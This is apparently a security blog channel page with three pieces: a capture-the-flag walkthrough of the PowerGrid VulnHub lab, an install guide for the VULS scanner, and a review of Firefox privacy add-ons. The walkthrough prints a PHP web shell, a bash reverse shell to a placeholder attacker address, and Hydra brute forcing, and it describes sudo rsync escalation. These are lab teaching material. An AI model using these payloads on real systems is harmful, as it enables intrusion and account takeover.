Channel: Hacking Articles|Raj Chandel's Blog

PowerGrid: 1.0.1 Vulnhub Walkthrough


Today we are going to solve another boot2root challenge called "PowerGrid: 1.0.1".  It's available at VulnHub for penetration testing and you can download it from here.

Credit for creating this lab goes to Thomas Williams. Let's get started and learn how to break it down successfully.

Level: Hard

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Dirsearch

Exploiting

  • HTTP Basic Authentication brute force
  • Remote code execution (RCE) via a Roundcube exploit
  • Decrypting a PGP key and abusing it for SSH access

Privilege Escalation

§  Abusing sudo rights on rsync

§  Abusing SSH pivoting

§  Capture the flag

Walkthrough

Reconnaissance

We look for the target machine on the network with netdiscover:

$ netdiscover -i ethX



So, we add the IP address to our "/etc/hosts" file and start by scanning all ports with operating system detection, software versions, scripts and traceroute.

$ nmap -A -p- powergrid.vh

 


Enumeration

The game begins, and so does the pressure, since we will only have 3 hours to solve the challenge and thus save the critical infrastructure.

We access the web service and see the time remaining, but we also enumerate three users: deez1, p48 and all2.



We use dirsearch and find a directory protected with HTTP Basic Authentication.




With what we found, and knowing the 3 users, we launch a brute-force attack with the Hydra tool and the rockyou dictionary.
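A sketch of what this attack looks like; the protected path (/performance-data/) and wordlist location are assumptions, not values taken from the lab.

```shell
# Hypothetical Hydra invocation (path and wordlist are assumptions):
#   hydra -L users.txt -P /usr/share/wordlists/rockyou.txt powergrid.vh http-get /performance-data/
#
# Under the hood, HTTP Basic auth is just base64("user:pass") sent in a
# header, retried once per candidate password:
basic_header() {
  printf 'Authorization: Basic %s' "$(printf '%s:%s' "$1" "$2" | base64)"
}

# Example candidates standing in for rockyou entries:
for pass in password letmein admin123; do
  basic_header deez1 "$pass"
  echo
done
```

Hydra simply automates this loop against the server's 401 responses and stops when a candidate header comes back with a 200.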



We manage to log in with the credentials obtained and find a Roundcube webmail.



We use the same credentials and can read a single email. It contains a PGP-encrypted message, but to read its content in plain text we need the private key and its passphrase. The passphrase is very likely the same password, since this user has reused it across several services.



Exploiting

We check the version of Roundcube and look for exploits; we find that this version is vulnerable to RCE (Remote Code Execution).


Exploit: https://www.exploit-db.com/exploits/40892

As always, we will review what the exploitation consists of and make a proof of concept; this proof will create an info.php file.



Legitimate request:



Malicious request:



We run the file and see that the site is indeed vulnerable.



Now we will create a php file that allows us to execute arbitrary commands.

Payload to URL-encode: <?php passthru($_GET['cmd']); ?>
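Since the exploit wants the payload with every character percent-encoded, a small helper can produce that form; this is a sketch of the encoding step, not the exploit's own encoder.

```shell
# Percent-encode every byte of a string (full URL-encoding, as the exploit requires)
urlencode_all() {
  printf '%s' "$1" | od -An -tx1 | tr -d ' \n' | sed 's/../%&/g'
}

urlencode_all "<?php passthru(\$_GET['cmd']); ?>"
echo
```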



We check that our file works:



Perfect! Now we'll put a netcat listener on the wire and run a reverse shell. (Remember to URL-encode all characters.)
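The listener and reverse-shell pair would look something like this; the attacker IP and port 4444 are placeholders, not values from the lab.

```shell
# On the attacker machine (port 4444 is an assumption):
#   nc -lvnp 4444
#
# Reverse-shell command to pass through the cmd parameter, URL-encoded first:
rev='bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
echo "$rev"
```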


Great! Now we will use our two favorite commands to get an interactive shell.
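The author doesn't name the commands, but the classic pair for upgrading a dumb shell to an interactive TTY is presumably what's meant; here is a sketch, demonstrated against /bin/true so it exits cleanly instead of opening an interactive bash.

```shell
# The usual TTY-upgrade pair on the target would be:
#   python3 -c 'import pty; pty.spawn("/bin/bash")'
#   export TERM=xterm
#
# Same pty trick, run against /bin/true so this sketch terminates on its own:
python3 -c 'import pty; pty.spawn("/bin/true")' && echo "pty spawn ok"
```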



Going through files and directories recursively, we stumble upon the first flag and the first hint.



So let's continue: we log in as the user "p48", reusing the same credentials, and in his "/home/" folder we find the GPG private key (remember, it was the only thing we were missing to decrypt the message).



For some strange reason, the native "gpg" tool didn't work for me, so I had to use an online tool instead, and we obtain an SSH private key.



The machine we have compromised has no SSH service open. Remembering the "pivot" hint, we check the connections and find a service running under "docker".



We give 600 permissions to the private key and use it to connect via SSH to the Docker container, where we read the 2nd flag and the next hint.
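The permission fix and connection look like this; the key filename and the container address (172.17.0.2, Docker's usual first bridge address) are assumptions for illustration.

```shell
# Create a stand-in for the recovered private key and lock it down;
# SSH refuses keys that are readable by other users.
touch id_rsa_p48
chmod 600 id_rsa_p48
stat -c '%a' id_rsa_p48

# Then, from the compromised host (container address is an assumption):
#   ssh -i id_rsa_p48 p48@172.17.0.2
```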



The next hint leads me to run "sudo -l" and confirm that we can run the rsync binary as root. We execute the following command to escalate privileges to root by abusing this right.
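The escalation command itself isn't shown in the text; the GTFOBins technique for sudo rsync, which is presumably what was used here, passes a shell through rsync's -e (remote shell) option. Shown only as a string, since running it requires sudo rights on the target.

```shell
# rsync's -e option runs an arbitrary command as the "remote shell"; under
# sudo this drops us into a root shell (GTFOBins technique, assumed to
# match what the author ran):
cmd='sudo rsync -e "sh -c \"sh 0<&2 1>&2\"" 127.0.0.1::'
echo "$cmd"
```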

And once root, we access its home folder and read the 3rd flag and the next hint.



Privilege Escalation (root)

"backwards? pivoting?" Let's repeat the SSH move, but this time we will do it from the compromised docker machine.

Great! We have permissions as root and we can read the last flag.



Author: David Utón is a penetration tester and security auditor for web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. He can be contacted on LinkedIn and Twitter.


VULS- An Agentless Vulnerability Scanner


VULS is an open-source agentless vulnerability scanner written in Go for Linux systems. For a server administrator, having to perform software updates and security vulnerability analysis daily can be a burden. VULS helps automate vulnerability analysis and avoids the burden of manually checking the software installed on each system. It draws on multiple vulnerability sources, such as Exploit DB, Metasploit, and the NVD (National Vulnerability Database).

 

Table of content

·         Vuls

§  Key Features

§  Architecture

·         Prerequisites

·         Installation & Configuration of Dependencies

§  Installing Dependencies

§  Installation & Configuration of GO-CVE-Dictionary

§  Installation & Configuration of Goval-Dictionary

§  Installation & Configuration of Gost

·         Install and Configure VULS

§  Install and configure VULS repo (GUI) Server

§  Requirements

§  Installation

§  Usage

§  DigestAuth

§  Configuration of TOML file

·         Running Local Scan

·         Scanning Multiple Remote Host systems

 

 

Vuls Feature & Architecture

Key Features

 

·         VULS provides a way of automating vulnerability analysis for Linux packages

·         VULS can be installed on many UNIX-like distributions, for example Ubuntu, Debian, FreeBSD, CentOS, Solaris, and so on…

·         VULS has the ability to scan multiple systems at a single time by using SSH protocol and to send reports via Slack or Email.

·         VULS offers three scan modes, Fast, Fast-Root, and Deep; you can select one according to the situation or your requirements.

·         Scan results can be Viewed by using TUI (Terminal user interface) and GUI (Graphical user interface).

·         When generating reports, VULS prioritizes high-severity vulnerabilities using the ranking systems established by the databases.

 

Architecture

 



 

Fast Scan: - It performs scans without root privilege, No dependencies, almost no load on the scan target server.

 

Fast-root Scan: - It performs scans with root privilege, no dependencies, almost no load on the scan target server.

 

Deep Scan: - It performs a scan with root privilege, containing all dependencies, almost full load on scan target server.

 

Offline Scan Mode: - Fast, Fast-root, and Deep scans each have an offline mode, with which VULS can scan without internet access.

 

Now let's see how to install and configure VULS as a vulnerability scanner.

 

 

Let’s take a look 🤔!!

 

Prerequisites

 

To configure VULS in your Ubuntu platform, there are some prerequisites required for installation.

§  Ubuntu 20.04.1 with minimum 4GB RAM and 2 CPU

§  SSH Access with Root Privileges

§  Firewall Port: - 5111

§  Multiple servers running (ubuntu 20.04 or any vulnerable server) if you want to set up VULS to scan remotely.

Installation & Configuration of Dependencies

 Let’s begin the installation process

Note: - The whole installation process takes a long time to finish, so make yourself comfortable before you begin.

 Installing Dependencies

In this section, we're going to create a folder vuls-data. VULS uses SQLite to store its vulnerability information, so we're going to install SQLite, the Go programming language, and other dependencies.

 

We are going to store all VULS related data in the /usr/share/vuls-data directory. To create it run the following as described below.

 

mkdir /usr/share/vuls-data

 

Now we have created the vuls-data folder where we are going to store all data; this will be our workspace. Before getting started, let's install the required dependencies.

Now, we’re going to install

·         SQLite: - VULS uses SQLite to store its vulnerability information.

·         Debian-goodies: - provides the checkrestart utility, which reports which packages need to be restarted at any moment.

·         GCC: - the GNU Compiler Collection, the standard compiler toolchain for Unix-like systems.

·         Wget

·         Make: - detects automatically which parts of a large program need to be recompiled and issues the commands to recompile them.

Install all dependencies by using the following command.

 

apt install sqlite git debian-goodies gcc make wget

 


Now you have installed the required dependencies. Next, install Go using the snap package manager by issuing the following command.

 

snap install go --classic

 

Next, you need to set up a few environment variables that specify the working directory for Go.

To avoid setting these variables every time a user logs on, automate this by creating an executable file go-env.sh under /etc/profile.d. Scripts in this directory are executed every time a user logs on. To automate this process, follow the commands below.

 

nano /etc/profile.d/go-env.sh

 

Add the following commands to the file:

 

export GOPATH=$HOME/go

export PATH=$PATH:$GOPATH/bin:/snap/bin

 

The go-env.sh file is not yet executable. Make it executable by changing its permissions with the following command.

 

chmod +x /etc/profile.d/go-env.sh

 

And then reload the environment variables by running the following command.

 

source /etc/profile.d/go-env.sh

 

Installation & Configuration of Go-CVE-dictionary

Let’s download and install go-cve-dictionary. The go-cve-dictionary is a tool that provides access to NVD (National Vulnerability Database). NVD is the US government repository of publicly reported cybersecurity vulnerabilities, that contains vulnerability IDs (CVE — Common Vulnerabilities and Exposures), summaries, and impact analysis, and is available in a machine-readable format. You can access the NVD using the Go package. Then you’ll need to run and fetch vulnerability data for VULS to use.

Let's install go-cve-dictionary under $GOPATH/src/ by cloning the Go package by kotakanbe from GitHub and compiling it afterward.

 

Let’s start it by creating a directory where to store Go-cve-dictionary by running the following command.

 

mkdir -p $GOPATH/src/github.com/kotakanbe

 

Navigate to it and clone go-cve-dictionary from GitHub by issuing the following commands:

 

cd $GOPATH/src/github.com/kotakanbe

git clone https://github.com/kotakanbe/go-cve-dictionary.git

 

And then navigate to the cloned package further then start installation.

 

cd go-cve-dictionary

make install

 



 

Then, to make it available system-wide, copy it to /usr/local/bin by running the command below.

 

cp $GOPATH/bin/go-cve-dictionary /usr/local/bin

 

go-cve-dictionary requires a log output directory; logs are generally created under /var/log/.

Let's create a log directory for go-cve-dictionary and, since a log directory readable by everyone is undesirable, restrict it to the current user by issuing the following commands.

 

mkdir /var/log/vuls

chmod 700 /var/log/vuls

 



 

Now fetch vulnerability data from NVD and store it to VULS workspace under /usr/share/vuls-data:

 

for i in `seq 2014 $(date +"%Y")`; do sudo go-cve-dictionary fetchnvd -dbpath /usr/share/vuls-data/cve.sqlite3 -years $i; done

 

In my case I'm fetching the CVE database from the year 2014; this downloads the NVD data from 2014 to the current year, but you can fetch data starting from whichever year you want.

 

NOTE: - This command will take a long time to finish; till then, go get yourself a coffee ☕.

 

 

Installation & Configuration of goval-dictionary

Let's download and install "goval-dictionary". OVAL (Open Vulnerability and Assessment Language) is an open language used to express checks for determining whether software vulnerabilities exist on a given system; goval-dictionary copies the OVAL data and provides access to the OVAL database for Ubuntu.

The goval-dictionary is also written by kotakanbe, so install it in the same folder you previously created under "$GOPATH/src/github.com/kotakanbe", then clone the package from GitHub by running the following commands.

 

cd $GOPATH/src/github.com/kotakanbe

git clone https://github.com/kotakanbe/goval-dictionary.git

 

And then navigate to the cloned package further then compile or install it with “make” by running the following command.

 

cd goval-dictionary

make install

 


 

Copy it to /usr/local/bin to make it globally accessible, and then fetch the OVAL data for Ubuntu 20.x (or another version, as per your requirement) by running the following commands.

 

cp $GOPATH/bin/goval-dictionary /usr/local/bin

goval-dictionary fetch-ubuntu -dbpath=/usr/share/vuls-data/oval.sqlite3 20

 


Installation & Configuration of gost

 

Let's download and install "gost". The Debian security bug tracker collects all information about the vulnerability status of packages distributed with Debian; gost mirrors this tracker and provides local access to its database.

Let’s install this package into a new folder by running the following command:

 

mkdir -p $GOPATH/src/github.com/knqyf263

 

Navigate to the folder you have just created, then clone the gost package from GitHub by running the following commands:

 

cd $GOPATH/src/github.com/knqyf263

sudo git clone https://github.com/knqyf263/gost.git

 

After the clone finishes, enter the cloned package and run "make install":

 

cd gost

make install

 

Don't forget to make it globally accessible, and then link its database into /usr/share/vuls-data by running the following commands:

 

cp $GOPATH/bin/gost /usr/local/bin

ln -s $GOPATH/src/github.com/knqyf263/gost/gost.sqlite3  /usr/share/vuls-data/gost.sqlite3

 

Create a log directory for gost, since it requires access to a log output directory, and restrict access to the current user by using the following commands:

 

mkdir /var/log/gost

chmod 700 /var/log/gost

 

And then, fetch the Debian security tracker data by issuing the following command:

 

gost fetch debian

 

Install & Configure VULS

We have installed all the required dependencies of VULS. Now you can download and install Vuls from source code. Afterward, you'll configure the VulsRepo server, which is the GUI interface for VULS.

Let’s Create a new directory that contains the path to the Vuls repository, by issuing the following command:

 

mkdir -p $GOPATH/src/github.com/future-architect

 

Navigate to the created directory then Clone Vuls from GitHub by running the following command:

 

cd $GOPATH/src/github.com/future-architect

git clone https://github.com/future-architect/vuls.git

 

Enter to the Package Folder and then compile and install by running the following command:

 

cd vuls

make install

 

Also, don’t forget to make it accessible globally

 

cp $GOPATH/bin/vuls /usr/local/bin

 

Hmm 😃 !! you have successfully installed VULS in your system

 

Install & Configure VULS repo server (GUI)

 

VulsRepo is an awesome OSS web UI for Vuls. With VulsRepo you can analyze the scan results like an Excel pivot table.

 

Requirements

 

To configure VULS in your Ubuntu platform, there are some prerequisites required for installation.

·         future-architect/Vuls >= v0.4.0

·         Web Browser: Google Chrome or Firefox

 

Installation

 

To install the VulsRepo server on your Ubuntu platform, follow the steps stated below.

 

Step 1. Installation

 

Clone the vuls-repo from GitHub by running the following command:

 

cd $HOME

git clone https://github.com/usiusi360/vulsrepo.git

Step 2. Change the setting of vulsrepo-server

 

Set Path according to your environment.

 

cd $HOME/vulsrepo/server

cp vulsrepo-config.toml.sample vulsrepo-config.toml

nano vulsrepo-config.toml

[Server]

rootPath = "/root/vulsrepo"

resultsPath  = "/usr/share/vuls-data/results"

serverPort  = "5111"

 


Step 3. Start vulsrepo-server

 

Start the vulsrepo-server by executing the below command under the directory $HOME/vulsrepo/server.

 

cd $HOME/vulsrepo/server

./vulsrepo-server

 

You can verify whether it is running by opening the URL below. Make sure port 5111 is open on your server firewall; then you can access the vulsrepo-server web interface at

 

http://localhost:5111

 


Nice 😀 !! As you can see it is successfully installed

 

Step 4. Always activate vulsrepo-server

 

In Case: SystemV (/etc/init.d)

 

Copy startup file. Change the variable according to the environment.

 

cp $HOME/vulsrepo/server/scripts/vulsrepo.init /etc/init.d/vulsrepo

chmod 755 /etc/init.d/vulsrepo

nano /etc/init.d/vulsrepo

 


Then edit the conf file to match your environment.

 


In Case of: systemd (systemctl)

 

Copy startup file. Change the variables according to the environment.

sudo cp $HOME/vulsrepo/server/scripts/vulsrepo.service /lib/systemd/system/vulsrepo.service

nano /lib/systemd/system/vulsrepo.service

 


And then make change in conf file as per your environment as shown below





start vulsrepo-server

systemctl start vulsrepo

 

Usage

 

Access the browser

 

http://<server-address>:5111

 

DigestAuth


Create an authentication file to perform digest authentication:


./vulsrepo-server -h

./vulsrepo-server -m


Edit vulsrepo-config.toml

 

nano vulsrepo-config.toml

 

Use SSL

Create a self-signed certificate by issuing the following command

 

openssl genrsa -out key.pem 2048

openssl req -new -x509 -sha256 -key key.pem -out cert.pem -days 3650

 

Edit vulsrepo-config.toml file as shown below by running the following command

 

nano vulsrepo-config.toml

 



 

Start vulsrepo-server

 

Restart Vulsrepo-server by running the following command:

 

systemctl restart vulsrepo

 

Then visit the web interface and enter the login credentials that you created during the installation process to access the GUI. Once you have logged in, you will have your VULS GUI dashboard ready to set fire on the vulnerabilities 😊.

 

Configuration of TOML file

 

Now, it’s time to create a configuration file for Vuls. Navigate back to /usr/share/vuls-data:

 

cd /usr/share/vuls-data

 

Vuls stores its configuration in a TOML file, config.toml. Create it by issuing the following command:

 

nano config.toml

 



 

And then Enter the following configuration:

 

[cveDict]

type = "sqlite3"

SQLite3Path = "/usr/share/vuls-data/cve.sqlite3"

 

[ovalDict]

type = "sqlite3"

SQLite3Path = "/usr/share/vuls-data/oval.sqlite3"

 

[gost]

type = "sqlite3"

SQLite3Path = "/usr/share/vuls-data/gost.sqlite3"

 

[servers]

 

[servers.localhost]

host = "localhost"

port = "local"

scanMode = [ "fast" ]

#scanMode = ["fast", "fast-root", "deep", "offline"]

 

Then save and close the file.

 

Ok 😃 !! You have successfully created the config.toml file.

To test the validity of the configuration file, run the following command:

 

vuls configtest

 

Congratulations!! You’ve installed and configured Vuls to scan the local server on your Ubuntu Platform😉.

 

Running local Scan

Excited? Let's do it 😁 !!

 

The default scan mode, if not explicitly specified, is fast.

To run a scan, execute the following command:

 

vuls scan

 


Wow !! As we can see, it scanned the whole system and generated a report.

Wait, this is not enough… let's see what's inside the report.

To check the report on TUI (Terminal based user interface) issue the following command

vuls tui

 

Vuls divides the generated report view into four panels as stated below:

 

·         Scanned hosts: located on the upper left, lists the hosts that Vuls scanned.

·         Found vulnerabilities: located right of the hosts list, shows the vulnerabilities that VULS found in installed packages.

·         Vulnerability information: shows detailed information about the selected vulnerability, pulled from the databases.

·         Vulnerable packages: located right of the detailed information, shows the affected packages and their versions.

 



 

Aha 😵 !! It’s hilarious

 

Let's check how the GUI shows these results.

 

Get back to the GUI Dashboard and then mark and submit the generated report that you want to view as shown below

 

And then see the magic 🙃 !!

 



 

As we can see, the JSON report is converted into a GUI view with detailed information. By clicking on CVE IDs you can get more information about each vulnerability.

You can also filter this report as you like by dragging the required field from the Heatmap section to Count, as shown below.

 



 

Let’s make it more informative by applying filters as shown below:

 


Scanning Multiple remote host systems

 

Step 1: Enable SSH from localhost

Vuls doesn't support SSH password authentication, so we have to use SSH key-based authentication. Create a key pair on the localhost, then copy the id_rsa.pub key into authorized_keys on the remote host.

 

On Localhost:

 

ssh-keygen -t rsa

 

Copy the ~/.ssh/id_rsa.pub key to the clipboard.

 

And go to the Remote Host and issue the following command:

 

mkdir ~/.ssh

chmod 700 ~/.ssh

nano ~/.ssh/authorized_keys

 

and then Paste the rsa.pub key from the clipboard to ~/.ssh/authorized_keys and then follow the below steps:

 

chmod 600 ~/.ssh/authorized_keys

 

 

Come back to the Localhost:

 

We also need to confirm that the host key of the remote scan target has been registered in the known_hosts of the localhost. To add the remote host's key to $HOME/.ssh/known_hosts, log in to the remote host through SSH once before scanning.

 

 

ssh root@192.168.29.219 -i ~/.ssh/id_rsa

 

where 192.168.29.219 is the IP of remote Host

 

Step 2: Configure (config.toml) as shown below

 

cd /usr/share/vuls-data

nano config.toml

 

[servers.ignite]

 host        = "192.168.29.219"

 port        = "22"

 user        = "root"

 keyPath     = "/root/.ssh/id_rsa"




 

Check and verify config.toml and settings on the server before scanning:

 

vuls configtest

 

Start scanning remote host by issuing the below command:

 

vuls scan

 



 

Congratulations 🙂!! As you can see, you have successfully scanned your remote host. Let's check the generated report on the GUI dashboard.

 


By applying more filters, you can hunt for and investigate vulnerable packages in more depth.

 

Let’s end Here !! 😊

Firefox for Pentester: Privacy and Protection Add-ons


In today's article, we will equip ourselves with the skill of protecting ourselves online. Firefox is a web browser developed by Mozilla. With its latest Quantum update, it provides improved speed and a unique design. Firefox is an amazing web browser: it's user-friendly and customizable. When we talk about penetration testers or security analysts, Firefox is the go-to browser. It has various add-ons that help protect us online and allow us some privacy post-Snowden revelations. The internet is the big unknown and the least trustworthy world in itself. Every month or so there are data breaches and malware attacks such as ransomware, and beyond that you are never secure. Various websites poach your data, personal information, etc.; accidentally stumble upon an ad and you are then bombarded with it. Now, if you are looking to get away from all this, then this article is the answer for you. But before we talk about the various add-ons that help us stay protected, we will talk about profiling in Firefox.

Table of Content:

·         Profiling in Firefox

·         Plug-ins

o  uBlock Origin

o  uMatrix

o  HTTPS Everywhere

o  Privacy settings

o  No Script

o  Privacy Badger

o  Decentraleyes

o  Terms of Service: Didn’t Read

o  Snowflake

o  Temporary Containers

Profiling in Firefox

In Firefox, you can create various profiles according to your needs, as these profiles are customizable. For instance, you can have one profile for research purposes and another for VAPT. Creating these profiles is convenient and quite easy. To create a profile, open your Firefox browser and type "about:profiles" in the URL bar, then simply click on "Create a New Profile", as shown in the image below:



Once you click on "Create a New Profile", a dialogue box will open. Fill in the name of the profile you want; here we used "Research_division". After that, click on the "Finish" button and the profile will be created.

 


Similarly, you can create as many profiles as you want with different names depending on your needs. In the image below you can see that we have created yet another profile by the name of "Privacy and Protection". The default location of every profile in Windows is C:\Users\%username%\AppData\Roaming\Mozilla\Firefox\Profiles, and in Linux the path is ~/.mozilla/firefox/, but you can always change it as you desire.

 


Both of our profiles are created as we wanted, with individual personalization, just as shown in the image below. These profiles separate all the information, plug-ins, and settings from one another. Once the profiles are created, you are given the option to set a profile as default or to launch it in a new browser window. You can also rename or remove profiles. There is also an option to open the directory where a profile is located; you will find both the root directory and local directory paths there.
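Profiles can also be managed from the command line, which is handy for scripting; these flags come from Firefox's documented command-line options, and the profile name is the one used above.

```shell
# Firefox profile management without the about:profiles page (sketch):
fx_create='firefox -CreateProfile "Research_division"'   # create a profile
fx_launch='firefox -P "Research_division" -no-remote'    # run a separate instance with it
printf '%s\n%s\n' "$fx_create" "$fx_launch"
```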




Plug-ins

uBlock Origin

uBlock Origin, created by Raymond Hill, is an open-source extension. It blocks advertisements in general, and especially the ones which can potentially be malicious. It even filters out the URLs of advertisements which use trackers to pursue your preferences and information. A major feature of this amazing ad blocker is that it blocks even the latest tracking techniques, such as CNAME cloaking. As you traverse from website to website, uBlock stops one website from sharing your data with another; this kind of cross-site data sharing is harder to pinpoint with other ad blockers, but with uBlock Origin it is not a problem. Along with all this, it also blocks pop-ups, cosmetic ads, and remote fonts, and can even disable JavaScript. As a bonus, it removes YouTube ads too.

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.

 


uMatrix

uMatrix is an add-on created by Raymond Hill as well. It was developed to let you easily control your web content, i.e. you can permit what will load in your browser and what will not. This add-on works like a firewall: it prevents websites from using your cookies and protects you from malware, trackers, bloatware, etc. An important side effect is that, because it blocks trackers and disallows unnecessary code from executing, it increases page load speed and even improves bandwidth consumption. uMatrix takes precautionary steps and blocks third-party domains, which makes it difficult to access some sites, but that can be adjusted depending on your demands. Things that you can control via uMatrix are:

·         Cookies

·         CSS

·         Image

·         Media

·         Scripts

·         XHR

·         Frame

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.

 



 

HTTPS Everywhere

There is a multitude of websites all over the internet that do not have SSL protection. Many of these are used as decoys to hack, or are prone to Man-in-the-Middle (MITM) attacks themselves. While surfing the web, you can never be sure which website is which and whether it is safe to browse. HTTPS Everywhere is an answer to this problem, as it protects you from such online threats. This browser extension provides you with an SSL/TLS layer of protection across the internet. This layer of protection encrypts whatever information is sent to or received from a website, which keeps your data safe from attacks like spoofing, sniffing, MITM, etc.

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.


Privacy Settings

This extension is developed by Jeremy Schomery. It is a most convenient extension, as it brings all the privacy settings options together in one place. All the settings can be adjusted from the pop-up menu of the extension, which has a tool panel for all our preferences. To provide you with privacy, this extension makes sure that no data is sent to a third-party website.

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.



 


NoScript Security Suite

NoScript Security Suite is developed by Giorgio Maone. It is referred to as a suite because it provides various security measures for both developers and security analysts. Many security analysts argue that disabling JavaScript in the browser is an important practice for being entirely secure: there are few, but major, browser vulnerabilities that exploit JavaScript to attack the target. Although almost all websites try to make themselves secure against these vulnerabilities, one can never be too sure, and it's a fool's errand to be entirely dependent on others for your protection. So users should protect themselves from their end too, and this extension helps us achieve that. NoScript makes controlling and disabling JavaScript as easy as possible. Many people will point out that today's browsers already provide the option of disabling JavaScript, so why do we need this extension? The point to note is that this built-in option is limited (the limitation depends on the browser) and you cannot control it the way you can with NoScript. This extension actively blocks executable content by default and also provides protection against known security exploits. Most importantly, it offers client-side security against cross-site scripting (XSS) and HTML injection, as it identifies malicious requests and neutralizes them. The extension also brings the Application Boundaries Enforcer, which works like a firewall whose policies can be defined by the user; it guards the entry points of the browser, which in turn helps keep the user safe from attacks like CSRF and DNS rebinding. Anti-clickjacking and HTTPS enhancement are also provided by this superb extension.

To add this extension, open your browser and search for it in the extension store. Click on the "Add to Firefox" button, then click "Add" in the pop-up dialogue box, as shown in the image below. The extension will be added to your browser, and you can customise its settings from the extension widget on the right-hand side of the URL bar.

 


 

Privacy Badger

This add-on is developed by EFF technologists, and they have done amazing work with it. While surfing the internet, privacy is a must, but there is a swarm of tracking ads, clickbait ads, and similar content online that interrupts your browsing and baits you into falling victim without even knowing it. The worst part is that there is hardly a way to find out whether you are being tracked. We can only spot the evidence: if you search for something online, you can be sure you will see ads about it for a long time afterwards, and hence the online tracking. The Privacy Badger extension comes in handy here. It is praised because it blocks cookies that track you even after you delete them, and it blocks third-party tracking too. Some third-party domains are required for a site to load itself; these may serve maps, images, and so on. The tool analyzes each request, allows the important ones, and disallows tracking cookies and referrers. Cookies that carry a tracking ID or are hidden are blocked by this add-on, and it even identifies supercookies that keep track of you. The add-on works in incognito mode as well and allows you to whitelist domains; this feature exists so that if you want to allow a particular tracking domain, you can permit it as required. It works by observing each domain's behaviour, and it also maintains a "yellow list" of websites that are known to collect your data and track you.

To add this extension, open your browser and search for it in the extension store. Click on the "Add to Firefox" button, then click "Add" in the pop-up dialogue box, as shown in the image below. The extension will be added to your browser, and you can customise its settings from the extension widget on the right-hand side of the URL bar.

 


 

Decentraleyes

Decentraleyes is developed by Thomas Reintjes. This is a wonderful add-on and a must-have if you are serious about privacy and protection. Usually, while browsing the internet, you are connected to public Content Delivery Networks (CDNs). These connections give you access to important and necessary JavaScript libraries that allow content to be loaded on a webpage. The catch is that being constantly connected to public CDNs is insecure in terms of privacy and tracking, and yet you cannot surf the web without such libraries. Decentraleyes is the solution to this problem: in the name of privacy and anti-tracking, it bundles the necessary libraries and stores them on your local machine. This way, when you are online, you no longer need to fetch them from public CDNs, because you can use the local copies. The fourteen JavaScript libraries provided by Decentraleyes are:

 

·         AngularJS

·         Backbone.js

·         Dojo

·         Ember.js

·         Ext Core

·         JQuery

·         JQuery UI

·         Modernizr

·         MooTools

·         Prototype

·         Scriptaculous

·         SWFObject

·         Underscore.js

·         Web Font Loader

 

And the list of networks supported by this marvelous extension is as follows:

 

·         Google Hosted Libraries

·         Microsoft Ajax

·         Cloudflare

·         JSDelivr

·         Yandex CDN

·         Baidu CDN

·         Sina Public Resources

·         UpYun libraries

 

It works by analyzing the HTML code of the page. After examining the HTML, it intercepts requests to public CDNs and swaps them with the local copies it provides. This way, the request to the external CDN is never sent from the browser, so the CDN cannot track your online activity or access your data.

To add this extension, open your browser and search for it in the extension store. Click on the "Add to Firefox" button, then click "Add" in the pop-up dialogue box, as shown in the image below. The extension will be added to your browser, and you can customise its settings from the extension widget on the right-hand side of the URL bar.



 


Terms of Service; Didn’t Read

Terms of Service; Didn't Read is a browser extension developed by Abdullah Diaa, Hugo, and Michiel de Jong. The name is wordplay on the phrase "Too long; Didn't Read". This is the simplest and yet one of the most important extensions. When it comes to the Terms of Service of a website, nobody wastes time before clicking "I Agree" or "I Accept"; the sheer quantity of complicated text confuses everybody. We all do it, yet none of us has the tiniest idea what we are agreeing to. Hence, this extension. It comes in handy by grading the Terms of Service of various websites from A to E, where A is best and E is worst. It also reviews privacy policies as positive, negative, or neutral. After learning the gist of the Terms of Service through this extension, it is wholly up to the user whether to access the website or not. The purpose of this add-on is to make users aware of the authenticity of the sites they use and let them know what the policies say and what they are agreeing to, so they can form an opinion and decide whether to continue. In our view, this is a must-have extension, as new exploitation through Terms of Service (identity theft, data collection, access to personal information, and so on) comes to light every other day.

To add this extension, open your browser and search for it in the extension store. Click on the "Add to Firefox" button, then click "Add" in the pop-up dialogue box, as shown in the image below. The extension will be added to your browser, and you can customise its settings from the extension widget on the right-hand side of the URL bar.

 


 

Snowflake

The Snowflake extension is created by The Tor Project. It was developed to give easy access to the Tor network after governments began blocking Tor bridges. Because it uses the Tor network, it allows you to be anonymous on the internet while protecting your data and identity. The extension lets you tap into the Tor network through a proxy backed by a multitude of servers. The entry points to these servers are known as Tor bridges, and Tor relays bounce the traffic, helping you stay anonymous for as long as you are surfing. Since it keeps you anonymous, you are protected against tracking and data collection, and it also helps hide your IP address.

To add this extension, open your browser and search for it in the extension store. Click on the "Add to Firefox" button, then click "Add" in the pop-up dialogue box, as shown in the image below. The extension will be added to your browser, and you can customise its settings from the extension widget on the right-hand side of the URL bar.

 



 

Temporary Containers

When you browse the internet traditionally, the browser saves all your cookies and cache in a single place. This makes it easy for websites to steal your data, intrude on your privacy, and track you. But if you contain all this separately, the problem is solved, and Temporary Containers makes that possible. It lets you create a container through which you can surf the internet without worrying about being tracked. The containers created by this extension are secluded, as the extension aims to segregate their data from the rest of the browser. These containers build on the basic profiling provided by Firefox (as mentioned at the start of this article), and by combining profiling with the Temporary Containers extension, your browser provides a safer, more secure environment for surfing the internet: a container and its data are removed when its last tab is closed. Both automatic and manual modes are supported.

